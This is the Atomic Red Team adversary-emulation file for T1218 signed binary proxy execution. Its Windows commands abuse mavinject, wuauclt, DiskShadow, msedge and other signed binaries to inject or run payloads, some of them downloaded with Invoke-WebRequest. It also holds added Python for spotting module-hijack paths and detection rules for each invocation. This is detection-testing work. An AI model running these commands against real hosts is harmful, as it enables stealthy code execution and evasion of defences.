2024-07-24 02:37:54 +00:00

attack_technique: T1218
display_name: Signed Binary Proxy Execution
atomic_tests:
- name: mavinject - Inject DLL into running process
  auto_generated_guid: c426dacf-575d-4937-8611-a148a86a5e61
  description: |
    Injects an arbitrary DLL into the running process specified by process ID. Requires Windows 10.
  supported_platforms:
  - windows
  input_arguments:
    process_id:
      description: PID of the process receiving the injection
      type: string
      default: "1000"
    dll_payload:
      description: DLL to inject
      type: path
      default: PathToAtomicsFolder\T1218\src\x64\T1218.dll
  dependency_executor_name: powershell
  dependencies:
  - description: |
      T1218.dll must exist on disk at specified location (#{dll_payload})
    prereq_command: |
      if (Test-Path "#{dll_payload}") {exit 0} else {exit 1}
    get_prereq_command: |
      New-Item -Type Directory (split-path "#{dll_payload}") -ErrorAction ignore | Out-Null
      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/x64/T1218.dll" -OutFile "#{dll_payload}"
  executor:
    command: |
      mavinject.exe #{process_id} /INJECTRUNNING "#{dll_payload}"
    name: command_prompt
    elevation_required: true
- name: Register-CimProvider - Execute evil dll
  auto_generated_guid: ad2c17ed-f626-4061-b21e-b9804a6f3655
  description: |
    Executes an arbitrary DLL. Requires at least Windows 8/2012. Note that the DLL can also be served via SMB (UNC path).
  supported_platforms:
  - windows
  input_arguments:
    dll_payload:
      description: DLL to execute
      type: path
      default: PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll
  dependency_executor_name: powershell
  dependencies:
  - description: |
      T1218-2.dll must exist on disk at specified location (#{dll_payload})
    prereq_command: |
      if (Test-Path "#{dll_payload}") {exit 0} else {exit 1}
    get_prereq_command: |
      New-Item -Type Directory (split-path "#{dll_payload}") -ErrorAction ignore | Out-Null
      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}"
  executor:
    command: |
      C:\Windows\SysWow64\Register-CimProvider.exe -Path "#{dll_payload}"
    name: command_prompt
- name: InfDefaultInstall.exe .inf Execution
  auto_generated_guid: 54ad7d5a-a1b5-472c-b6c4-f8090fb2daef
  description: |
    Test execution of a .inf using InfDefaultInstall.exe
    Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Infdefaultinstall.yml
  supported_platforms:
  - windows
  input_arguments:
    inf_to_execute:
      description: Local location of inf file
      type: string
      default: PathToAtomicsFolder\T1218\src\Infdefaultinstall.inf
  dependency_executor_name: powershell
  dependencies:
  - description: |
      INF file must exist on disk at specified location (#{inf_to_execute})
    prereq_command: |
      if (Test-Path "#{inf_to_execute}") {exit 0} else {exit 1}
    get_prereq_command: |
      New-Item -Type Directory (split-path "#{inf_to_execute}") -ErrorAction ignore | Out-Null
      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Infdefaultinstall.inf" -OutFile "#{inf_to_execute}"
  executor:
    command: |
      InfDefaultInstall.exe "#{inf_to_execute}"
    name: command_prompt
- name: ProtocolHandler.exe Downloaded a Suspicious File
  auto_generated_guid: db020456-125b-4c8b-a4a7-487df8afb5a2
  description: |
    Emulates an attack that delivers a document through the Microsoft Office protocol handler (an ms-word: URI pointing at a remote file). On successful execution you should see Microsoft Word launch a blank file.
  supported_platforms:
  - windows
  input_arguments:
    remote_url:
      description: URL of the document to fetch
      type: url
      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218/src/T1218Test.docx
  dependency_executor_name: powershell
  dependencies:
  - description: |
      Microsoft Word must be installed
    prereq_command: |
      try {
        $wdApp = New-Object -COMObject "Word.Application"
        Stop-Process -Name "winword"
        exit 0 } catch { exit 1 }
    get_prereq_command: |
      Write-Host "You will need to install Microsoft Word manually to meet this requirement"
  executor:
    name: command_prompt
    elevation_required: false
    command: |
      FOR /F "tokens=2*" %a in ('reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Winword.exe" /V PATH') do set microsoft_wordpath=%b
      call "%microsoft_wordpath%\protocolhandler.exe" "ms-word:nft|u|#{remote_url}"
- name: Microsoft.Workflow.Compiler.exe Payload Execution
  auto_generated_guid: 7cbb0f26-a4c1-4f77-b180-a009aa05637e
  description: |
    Emulates an attack with Microsoft.Workflow.Compiler.exe running a .NET assembly that launches calc.exe
  supported_platforms:
  - windows
  input_arguments:
    xml_payload:
      description: XML payload to execute
      type: path
      default: PathToAtomicsFolder\T1218\src\T1218.xml
    mwcpath:
      description: Default location of Microsoft.Workflow.Compiler.exe
      type: path
      default: C:\Windows\Microsoft.NET\Framework64\v4.0.30319
    mwcname:
      description: Default name of microsoft.workflow.compiler.exe
      type: path
      default: microsoft.workflow.compiler.exe
  dependency_executor_name: powershell
  dependencies:
  - description: |
      .NET must be installed for this test to work correctly.
    prereq_command: |
      if (Test-Path #{mwcpath}\#{mwcname} ) {exit 0} else {exit 1}
    get_prereq_command: |
      write-host ".NET must be installed for this test to work correctly."
  executor:
    command: |
      #{mwcpath}\#{mwcname} "#{xml_payload}" output.txt
    name: powershell
    elevation_required: false
- name: Renamed Microsoft.Workflow.Compiler.exe Payload Execution
  auto_generated_guid: 4cc40fd7-87b8-4b16-b2d7-57534b86b911
  description: |
    Emulates an attack with a renamed copy of Microsoft.Workflow.Compiler.exe running a .NET assembly that launches calc.exe
  supported_platforms:
  - windows
  input_arguments:
    xml_payload:
      description: XML payload to execute
      type: path
      default: PathToAtomicsFolder\T1218\src\T1218.xml
    renamed_binary:
      description: Path for the renamed copy of Microsoft.Workflow.Compiler.exe
      type: path
      default: PathToAtomicsFolder\..\ExternalPayloads\svchost.exe
    mwcpath:
      description: Default location of Microsoft.Workflow.Compiler.exe
      type: path
      default: C:\Windows\Microsoft.NET\Framework64\v4.0.30319
    mwcname:
      description: Default name of microsoft.workflow.compiler.exe
      type: path
      default: microsoft.workflow.compiler.exe
  dependency_executor_name: powershell
  dependencies:
  - description: |
      A renamed copy of Microsoft.Workflow.Compiler.exe must exist at #{renamed_binary} (.NET must be installed for this test to work correctly).
    prereq_command: |
      if (Test-Path "#{renamed_binary}") {exit 0} else {exit 1}
    get_prereq_command: |
      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
      Copy-Item #{mwcpath}\#{mwcname} "#{renamed_binary}" -Force
  executor:
    command: |
      &"#{renamed_binary}" "#{xml_payload}" output.txt
    name: powershell
    elevation_required: false
- name: Invoke-ATHRemoteFXvGPUDisablementCommand base test
  auto_generated_guid: 9ebe7901-7edf-45c0-b5c7-8366300919db
  description: |
    RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).

    One of the PowerShell functions called by RemoteFXvGPUDisablement.exe is Get-VMRemoteFXPhysicalVideoAdapter, a part of the Hyper-V module. This atomic test influences RemoteFXvGPUDisablement.exe to execute custom PowerShell code by using a technique referred to as "PowerShell module load-order hijacking": a module containing, in this case, an implementation of Get-VMRemoteFXPhysicalVideoAdapter is loaded first by introducing a temporary module into the first directory listed in the %PSModulePath% environment variable, or into a user-specified module directory outside of %PSModulePath%. Upon execution the temporary module is deleted.

    Invoke-ATHRemoteFXvGPUDisablementCommand is used in this test to demonstrate how a PowerShell host executable can be directed to user-supplied PowerShell code without needing to supply anything at the command line. PowerShell code execution is triggered when supplying the "Disable" argument to RemoteFXvGPUDisablement.exe.

    The Invoke-ATHRemoteFXvGPUDisablementCommand function outputs all relevant execution-related artifacts.

    Reference: https://github.com/redcanaryco/AtomicTestHarnesses/blob/master/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1
  supported_platforms:
  - windows
  input_arguments:
    module_name:
      description: Specifies a temporary module name to use. If -ModuleName is not supplied, a 16-character random temporary module name is used. A PowerShell module can have any name, because the technique abuses module load order rather than a specific module name.
      type: string
      default: foo
    module_path:
      description: Specifies an alternate, non-default PowerShell module path for RemoteFXvGPUDisablement.exe. If -ModulePath is not specified, the first entry in %PSModulePath% will be used. Typically, this is %USERPROFILE%\Documents\WindowsPowerShell\Modules.
      type: string
      default: $PWD
  dependencies:
  - description: The AtomicTestHarnesses module must be installed and Invoke-ATHRemoteFXvGPUDisablementCommand must be exported in the module.
    prereq_command: |-
      $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
      if (-not $RequiredModule) {exit 1}
      if (-not $RequiredModule.ExportedCommands['Invoke-ATHRemoteFXvGPUDisablementCommand']) {exit 1} else {exit 0}
    get_prereq_command: |
      Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
  executor:
    command: 'Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName #{module_name} -ModulePath #{module_path}'
    name: powershell
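The load-order hijack described above depends on where in %PSModulePath% a writable directory sits relative to the directory that really provides Get-VMRemoteFXPhysicalVideoAdapter. The following is an added example, not code from the Atomic Red Team project or the AtomicTestHarnesses module: a simplified model of PowerShell's module auto-loading (first module in path order that exports the wanted command wins) run over a constructed directory listing and writability map. The PSModulePath layout, the user name and the module contents are all sample data.

```python
"""Simplified model of PowerShell module auto-loading by PSModulePath order."""
from typing import Dict, List, Optional, Tuple

# Directory -> {module name -> exported command names}. CONSTRUCTED sample
# data that loosely mirrors a default Windows 10 layout, where the Hyper-V
# module exporting Get-VMRemoteFXPhysicalVideoAdapter lives under system32.
SAMPLE_LISTING: Dict[str, Dict[str, List[str]]] = {
    r"C:\Users\alice\Documents\WindowsPowerShell\Modules": {},
    r"C:\Program Files\WindowsPowerShell\Modules": {"PSReadLine": ["Set-PSReadLineOption"]},
    r"C:\Windows\system32\WindowsPowerShell\v1.0\Modules": {
        "Hyper-V": ["Get-VMRemoteFXPhysicalVideoAdapter", "Get-VM"],
        "Defender": ["Get-MpPreference"],
    },
}

# CONSTRUCTED: which directories the current (non-admin) user can write to.
SAMPLE_WRITABLE: Dict[str, bool] = {
    r"C:\Users\alice\Documents\WindowsPowerShell\Modules": True,
    r"C:\Program Files\WindowsPowerShell\Modules": False,
    r"C:\Windows\system32\WindowsPowerShell\v1.0\Modules": False,
}

# Same order as the dictionary above, i.e. the typical default search order.
SAMPLE_PSMODULEPATH = ";".join(SAMPLE_LISTING)
HIJACK_TARGET = "Get-VMRemoteFXPhysicalVideoAdapter"


def split_psmodulepath(value: str) -> List[str]:
    """PSModulePath is ';'-separated; empty entries are ignored."""
    return [p.strip() for p in value.split(";") if p.strip()]


def resolve_command(psmodulepath: str, command: str,
                    listing: Dict[str, Dict[str, List[str]]]) -> Optional[Tuple[str, str]]:
    """(directory, module) of the first module in path order that exports
    `command`, i.e. the one the auto-loader would import. Names compare
    case-insensitively, like Windows file names and PowerShell command names."""
    want = command.lower()
    for directory in split_psmodulepath(psmodulepath):
        for module, exports in listing.get(directory, {}).items():
            if any(e.lower() == want for e in exports):
                return directory, module
    return None


def hijack_candidates(psmodulepath: str, command: str,
                      listing: Dict[str, Dict[str, List[str]]],
                      writable: Dict[str, bool]) -> List[str]:
    """Writable directories that precede the legitimate provider of `command`.
    A module planted in any of them shadows the real one without touching
    anything under system32, which is the whole point of the technique."""
    order = split_psmodulepath(psmodulepath)
    legit = resolve_command(psmodulepath, command, listing)
    stop = order.index(legit[0]) if legit else len(order)
    return [d for d in order[:stop] if writable.get(d, False)]


def plant_module(listing: Dict[str, Dict[str, List[str]]], directory: str,
                 module: str, exports: List[str]) -> Dict[str, Dict[str, List[str]]]:
    """Copy of `listing` with a temporary module added (the harness drops one
    into the first PSModulePath entry and deletes it after execution)."""
    new = {d: dict(mods) for d, mods in listing.items()}
    new.setdefault(directory, {})[module] = list(exports)
    return new


def demo() -> Tuple[Optional[Tuple[str, str]], List[str], Optional[Tuple[str, str]]]:
    """Resolution before planting, the writable shadowing dirs, and after."""
    before = resolve_command(SAMPLE_PSMODULEPATH, HIJACK_TARGET, SAMPLE_LISTING)
    cands = hijack_candidates(SAMPLE_PSMODULEPATH, HIJACK_TARGET, SAMPLE_LISTING, SAMPLE_WRITABLE)
    # "foo" is the module name used as the test's default; any name works.
    planted = plant_module(SAMPLE_LISTING, cands[0], "foo", [HIJACK_TARGET])
    after = resolve_command(SAMPLE_PSMODULEPATH, HIJACK_TARGET, planted)
    return before, cands, after


if __name__ == "__main__":
    b, c, a = demo()
    print("before planting:", b)
    print("writable directories searched earlier:", c)
    print("after planting:", a)
```

The audit half of this is `hijack_candidates`: on a real host, replace the constructed writability map with an ACL check of each %PSModulePath% entry, and treat any user-writable entry that precedes the system module directories as a hijack surface for every signed PowerShell host, not just RemoteFXvGPUDisablement.exe.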
- name: DiskShadow Command Execution
  auto_generated_guid: 0e1483ba-8f0c-425d-b8c6-42736e058eaa
  description: |
    Emulates an attack in which DiskShadow.exe (a LOLBIN installed by default on Windows) is used to execute arbitrary commands from a script file.
    Reference: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
  supported_platforms:
  - windows
  input_arguments:
    txt_payload:
      description: DiskShadow script (txt) to execute
      type: path
      default: PathToAtomicsFolder\T1218\src\T1218.txt
    dspath:
      description: Default location of DiskShadow.exe
      type: path
      default: C:\Windows\System32\diskshadow.exe
  dependency_executor_name: powershell
  dependencies:
  - description: txt file must exist on disk at specified location (#{txt_payload})
    prereq_command: |
      if (Test-Path "#{txt_payload}") {exit 0} else {exit 1}
    get_prereq_command: |
      New-Item -Type Directory (split-path "#{txt_payload}") -ErrorAction ignore | Out-Null
      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/T1218.txt" -OutFile "#{txt_payload}"
  - description: DiskShadow.exe must exist on disk at specified location (#{dspath})
    prereq_command: |
      if (Test-Path #{dspath}) {exit 0} else {exit 1}
    get_prereq_command: |
      echo "DiskShadow.exe not found on disk at expected location"
  executor:
    command: |
      #{dspath} -S #{txt_payload}
    name: powershell
    elevation_required: false
- name: Load Arbitrary DLL via Wuauclt (Windows Update Client)
  auto_generated_guid: 49fbd548-49e9-4bb7-94a6-3769613912b8
  description: |
    This test uses Wuauclt to load an arbitrary DLL. Upon execution with the default inputs, calculator.exe will be launched.
    See https://dtm.uk/wuauclt/
  supported_platforms:
  - windows
  input_arguments:
    arbitrary_dll:
      description: Path of DLL to be loaded
      type: string
      default: PathToAtomicsFolder\T1218\bin\calc.dll
  dependency_executor_name: powershell
  dependencies:
  - description: |
      DLL to load must exist on disk at specified location (#{arbitrary_dll})
    prereq_command: |
      if (test-path "#{arbitrary_dll}"){exit 0} else {exit 1}
    get_prereq_command: |
      New-Item -Type Directory (split-path "#{arbitrary_dll}") -ErrorAction ignore | Out-Null
      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/bin/calc.dll?raw=true" -OutFile "#{arbitrary_dll}"
  executor:
    command: |
      wuauclt.exe /UpdateDeploymentProvider "#{arbitrary_dll}" /RunHandlerComServer
    cleanup_command: |-
      taskkill /f /im calculator.exe > nul 2>&1
    name: command_prompt
- name: Lolbin Gpscript logon option
  auto_generated_guid: 5bcda9cd-8e85-48fa-861d-b5a85d91d48c
  description: |
    Executes logon scripts configured in Group Policy.
    https://lolbas-project.github.io/lolbas/Binaries/Gpscript/
    https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/
  supported_platforms:
  - windows
  executor:
    command: |
      Gpscript /logon
    name: command_prompt
- name: Lolbin Gpscript startup option
  auto_generated_guid: f8da74bb-21b8-4af9-8d84-f2c8e4a220e3
  description: |
    Executes startup scripts configured in Group Policy.
    https://lolbas-project.github.io/lolbas/Binaries/Gpscript/
    https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/
  supported_platforms:
  - windows
  executor:
    command: |
      Gpscript /startup
    name: command_prompt
- name: Lolbas ie4uinit.exe use as proxy
  auto_generated_guid: 13c0804e-615e-43ad-b223-2dfbacd0b0b3
  description: |
    Executes commands from a specially prepared ieuinit.inf file placed next to a copy of ie4uinit.exe.
    PoC from: https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
    Reference: https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/
  supported_platforms:
  - windows
  input_arguments:
    Path_inf:
      description: Path to the .inf file
      type: path
      default: PathToAtomicsFolder\T1218\src\ieuinit.inf
    Path_ie4uinit:
      description: Path to ie4uinit.exe
      type: path
      default: c:\windows\system32\ie4uinit.exe
  dependency_executor_name: powershell
  dependencies:
  - description: |
      ieuinit.inf must exist on disk at specified location (#{Path_inf})
    prereq_command: |
      if (Test-Path "#{Path_inf}") {exit 0} else {exit 1}
    get_prereq_command: |
      New-Item -Type Directory (split-path "#{Path_inf}") -ErrorAction ignore | Out-Null
      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/ieuinit.inf" -OutFile "#{Path_inf}"
  executor:
    command: |
      copy #{Path_ie4uinit} %TEMP%\ie4uinit.exe
      copy "#{Path_inf}" %TEMP%\ieuinit.inf
      %TEMP%\ie4uinit.exe -BaseSettings
    cleanup_command: |
      del %TEMP%\ie4uinit.exe >nul 2>&1
      del %TEMP%\ieuinit.inf >nul 2>&1
    name: command_prompt
- name: LOLBAS CustomShellHost to Spawn Process
  auto_generated_guid: b1eeb683-90bb-4365-bbc2-2689015782fe
  description: |
    This test simulates an adversary copying `customshellhost.exe` and `calc.exe` from `C:\Windows\System32\` to `#{dest_path}`, renaming `calc.exe` to `explorer.exe`.
    Upon execution, customshellhost.exe will spawn the copied calc.exe (as explorer.exe).
    Note this will only work on Windows 10 or 11.
    [LOLBAS](https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/)
    [BishopFox](https://bishopfox.com/blog/edr-bypass-with-lolbins)
  supported_platforms:
  - windows
  input_arguments:
    dest_path:
      description: Directory to copy files into
      type: path
      default: C:\test
  executor:
    command: |
      if (-not (Test-Path #{dest_path})) {
        New-Item -Path #{dest_path} -ItemType Directory
      } else {
        Write-Host "Directory #{dest_path} already exists."
      }
      Copy-Item -Path "C:\windows\system32\customshellhost.exe" -Destination "#{dest_path}\customshellhost.exe" -Force
      Copy-Item -Path "C:\windows\system32\calc.exe" -Destination "#{dest_path}\explorer.exe" -Force
      #{dest_path}\customshellhost.exe
    cleanup_command: |
      Remove-Item -Path #{dest_path} -Recurse -Force
    name: powershell
    elevation_required: true
- name: Provlaunch.exe Executes Arbitrary Command via Registry Key
  auto_generated_guid: ab76e34f-28bf-441f-a39c-8db4835b89cc
  description: |
    Provlaunch.exe executes a command defined in the Registry. This test will create the necessary registry keys and values, then run provlaunch.exe to execute an arbitrary command.
    - https://twitter.com/0gtweet/status/1674399582162153472
    - https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/
    Registry keys are deleted after successful execution.
  supported_platforms:
  - windows
  executor:
    command: |
      reg.exe add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1 /v altitude /t REG_DWORD /d 0
      reg add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1\dummy2 /v Commandline /d calc.exe
      c:\windows\system32\provlaunch.exe LOLBin
    name: command_prompt
- name: LOLBAS Msedge to Spawn Process
  auto_generated_guid: e5eedaed-ad42-4c1e-8783-19529738a349
  description: |
    Executes a process under a trusted Microsoft-signed binary, msedge.exe. This test will spawn "calc.exe" as a child process of msedge.exe.
    - https://lolbas-project.github.io/lolbas/Binaries/Msedge/
  supported_platforms:
  - windows
  executor:
    command: |
      $edgePath64 = "C:\Program Files\Microsoft\Edge\Application\msedge.exe"
      if (Test-Path $edgePath64) {
        $edgePath = $edgePath64
      } else {
        # Check 32-bit Edge installation path
        $edgePath32 = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
        if (Test-Path $edgePath32) {
          $edgePath = $edgePath32
        } else {
          exit 1
        }
      }
      & $edgePath --disable-gpu-sandbox --gpu-launcher="C:\\Windows\\System32\\calc.exe &&"
      sleep 5
      taskkill -f -im msedge.exe
      taskkill -f -im calc.exe
      taskkill -f -im win32calc.exe
    name: powershell
- name: System Binary Proxy Execution - Wlrmdr Lolbin
  auto_generated_guid: 7816c252-b728-4ea6-a683-bd9441ca0b71
  description: Use wlrmdr.exe (Windows Logon Reminder executable) as a proxy binary to launch an arbitrary executable and evade defensive countermeasures
  supported_platforms:
  - windows
  input_arguments:
    payload_path:
      description: Path to the executable
      type: string
      default: C:\Windows\System32\calc.exe
  executor:
    command: wlrmdr.exe -s 3600 -f 0 -t _ -m _ -a 11 -u "#{payload_path}"
    name: powershell
    elevation_required: false
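Every test in this file executes a signed Microsoft binary with one argument that turns it into a proxy, and the renamed Microsoft.Workflow.Compiler.exe test shows why image name alone is not enough. The following is an added example, not part of the Atomic Red Team project: process-creation triage rules for the invocations above, run over constructed Sysmon Event ID 1 records flattened to tab-separated key=value pairs. The Office install path, the parent-process heuristic for Gpscript, and every sample line are assumptions made for the example. An OriginalFileName mismatch is a signal for review, not a verdict: some legitimate binaries carry a different name in their version resource.

```python
"""Process-creation triage for the T1218 LOLBin invocations in this test file.

Input: CONSTRUCTED, flattened Sysmon Event ID 1 records as tab-separated
key=value pairs (Image, CommandLine, OriginalFileName, ParentImage)."""
import ntpath
import re
from dataclasses import dataclass
from typing import Callable, Iterable, List, Optional, Tuple

SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
INTERACTIVE_PARENTS = ("cmd.exe", "powershell.exe", "pwsh.exe", "explorer.exe")  # assumption
# ms-word:<verb>|u|<url>; the ProtocolHandler test uses the nft (new from template) verb.
MS_WORD_URI = re.compile(r"ms-word:[a-z]+\|u\|(?P<url>[^\s\"]+)", re.IGNORECASE)


@dataclass
class ProcEvent:
    image: str
    command_line: str
    original_file_name: str
    parent_image: str

    @property
    def exe(self) -> str:
        return ntpath.basename(self.image).lower()

    @property
    def in_system_dir(self) -> bool:
        return ntpath.dirname(self.image).lower() in SYSTEM_DIRS

    @property
    def renamed(self) -> bool:
        # OriginalFileName comes from the PE version resource, so it survives a
        # rename on disk. Compare case-insensitively (e.g. "Cmd.Exe" vs cmd.exe).
        ofn = self.original_file_name.lower()
        return bool(ofn) and ofn != self.exe


def parse_event(line: str) -> ProcEvent:
    f = dict(kv.split("=", 1) for kv in line.rstrip("\n").split("\t") if "=" in kv)
    return ProcEvent(f.get("Image", ""), f.get("CommandLine", ""),
                     f.get("OriginalFileName", ""), f.get("ParentImage", ""))


def office_uri_url(command_line: str) -> Optional[str]:
    """URL that a protocolhandler.exe ms-word: URI will fetch, or None."""
    m = MS_WORD_URI.search(command_line)
    return m.group("url") if m else None


def has_flag(ev: ProcEvent, *needles: str) -> bool:
    cl = ev.command_line.lower()
    return any(n.lower() in cl for n in needles)


def parent_is_interactive(ev: ProcEvent) -> bool:
    return ntpath.basename(ev.parent_image).lower() in INTERACTIVE_PARENTS


# One rule per atomic test above. Each keys on the image name plus the argument
# or location that makes the invocation abusable, not on the binary alone.
RULES: List[Tuple[str, Callable[[ProcEvent], bool]]] = [
    ("mavinject /INJECTRUNNING", lambda e: e.exe == "mavinject.exe" and has_flag(e, "/injectrunning")),
    ("Register-CimProvider -Path DLL", lambda e: e.exe == "register-cimprovider.exe" and has_flag(e, "-path")),
    ("InfDefaultInstall .inf", lambda e: e.exe == "infdefaultinstall.exe" and has_flag(e, ".inf")),
    ("Office ProtocolHandler remote doc", lambda e: e.exe == "protocolhandler.exe" and office_uri_url(e.command_line) is not None),
    ("Microsoft.Workflow.Compiler", lambda e: "microsoft.workflow.compiler.exe" in (e.exe, e.original_file_name.lower())),
    ("RemoteFXvGPUDisablement Disable", lambda e: e.exe == "remotefxvgpudisablement.exe" and has_flag(e, "disable")),
    ("DiskShadow script", lambda e: e.exe == "diskshadow.exe" and has_flag(e, "-s ", "/s ")),
    ("wuauclt DLL load", lambda e: e.exe == "wuauclt.exe" and has_flag(e, "/updatedeploymentprovider") and has_flag(e, "/runhandlercomserver")),
    ("Gpscript from shell", lambda e: e.exe == "gpscript.exe" and has_flag(e, "/logon", "/startup") and parent_is_interactive(e)),
    ("ie4uinit outside System32", lambda e: e.exe == "ie4uinit.exe" and not e.in_system_dir),
    ("CustomShellHost outside System32", lambda e: e.exe == "customshellhost.exe" and not e.in_system_dir),
    ("Provlaunch trigger", lambda e: e.exe == "provlaunch.exe" or (e.exe == "reg.exe" and has_flag(e, "provisioning\\commands"))),
    ("msedge --gpu-launcher", lambda e: e.exe == "msedge.exe" and has_flag(e, "--gpu-launcher=")),
    ("wlrmdr -u", lambda e: e.exe == "wlrmdr.exe" and has_flag(e, " -u ")),
    ("Renamed binary (OriginalFileName mismatch)", lambda e: e.renamed),
]


def detect(ev: ProcEvent) -> List[str]:
    return [name for name, pred in RULES if pred(ev)]


def scan(lines: Iterable[str]) -> List[Tuple[str, List[str]]]:
    """(image basename, fired rules) for every line that trips at least one rule."""
    out = []
    for line in lines:
        ev = parse_event(line)
        hits = detect(ev)
        if hits:
            out.append((ev.exe, hits))
    return out


# CONSTRUCTED sample events (Image, CommandLine, OriginalFileName, ParentImage).
# The Office path is assumed. Entries 7 and 8 are benign controls.
_SYS = r"C:\Windows\System32"
_CMD, _PS = _SYS + r"\cmd.exe", _SYS + r"\WindowsPowerShell\v1.0\powershell.exe"
_AT = r"C:\AtomicRedTeam\atomics\T1218"
SAMPLE_EVENTS = [
    (_SYS + r"\mavinject.exe", rf'mavinject.exe 4812 /INJECTRUNNING "{_AT}\src\x64\T1218.dll"', "mavinject.exe", _CMD),
    (r"C:\Windows\SysWOW64\Register-CimProvider.exe", rf'C:\Windows\SysWow64\Register-CimProvider.exe -Path "{_AT}\src\Win32\T1218-2.dll"', "Register-CimProvider.exe", _CMD),
    (r"C:\AtomicRedTeam\ExternalPayloads\svchost.exe", rf'"C:\AtomicRedTeam\ExternalPayloads\svchost.exe" "{_AT}\src\T1218.xml" output.txt', "Microsoft.Workflow.Compiler.exe", _PS),
    (r"C:\Program Files\Microsoft Office\root\Office16\protocolhandler.exe", r'"C:\Program Files\Microsoft Office\root\Office16\protocolhandler.exe" "ms-word:nft|u|https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218/src/T1218Test.docx"', "protocolhandler.exe", _CMD),
    (_SYS + r"\wuauclt.exe", rf'wuauclt.exe /UpdateDeploymentProvider "{_AT}\bin\calc.dll" /RunHandlerComServer', "wuauclt.exe", _CMD),
    (r"C:\Users\alice\AppData\Local\Temp\ie4uinit.exe", r"C:\Users\alice\AppData\Local\Temp\ie4uinit.exe -BaseSettings", "IE4UINIT.EXE", _CMD),
    (r"C:\Program Files\Microsoft\Edge\Application\msedge.exe", r'"C:\Program Files\Microsoft\Edge\Application\msedge.exe" --disable-gpu-sandbox --gpu-launcher="C:\\Windows\\System32\\calc.exe &&"', "msedge.exe", _PS),
    (_SYS + r"\svchost.exe", _SYS + r"\svchost.exe -k netsvcs -p", "svchost.exe", _SYS + r"\services.exe"),
    (_SYS + r"\wuauclt.exe", "wuauclt.exe /detectnow", "wuauclt.exe", _SYS + r"\svchost.exe"),
    (_SYS + r"\reg.exe", r"reg.exe add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1\dummy2 /v Commandline /d calc.exe", "reg.exe", _CMD),
    (_SYS + r"\wlrmdr.exe", r'wlrmdr.exe -s 3600 -f 0 -t _ -m _ -a 11 -u "C:\Windows\System32\calc.exe"', "WLRMDR.EXE", _PS),
]
_KEYS = ("Image", "CommandLine", "OriginalFileName", "ParentImage")
SAMPLE_LINES = ["\t".join(f"{k}={v}" for k, v in zip(_KEYS, ev)) for ev in SAMPLE_EVENTS]

if __name__ == "__main__":
    for exe, rules in scan(SAMPLE_LINES):
        print(f"{exe:28} {', '.join(rules)}")
```

The renamed svchost.exe line trips two rules at once (the workflow-compiler rule via OriginalFileName and the generic mismatch rule), while the real svchost.exe and a plain wuauclt.exe invocation trip none; that pairing is the check worth keeping when these rules are ported to a SIEM.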